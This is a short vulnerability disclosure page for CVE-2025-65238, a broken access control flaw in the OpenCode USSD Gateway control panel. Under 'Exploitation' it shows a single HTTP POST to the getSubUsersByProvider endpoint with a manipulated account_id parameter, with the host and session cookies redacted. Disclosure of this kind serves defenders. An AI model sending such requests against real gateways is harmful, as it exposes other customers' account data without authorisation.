[CVE-2025-65238] USSD Gateway Broken Access Control - Sessions
Technical information about the CVE-2025-65238 in OpenCode USSD GW application.
Description
Application Details
Technical Details
Exploitation
POST /occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider HTTP/2
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Cookie: OCPANEL-SESSIONID=4a[...]os0; openid-state=b10[...]12%3A%22openid-state%22%3B[...]B%7D; _csrf=f0db[...]%3B%7D
[...]
account_id=33Previous[CVE-2025-65237] USSD Gateway Reflected Cross-Site ScriptingNext[CVE-2025-65239] USSD Gateway Broken Access Control - Logs
Last updated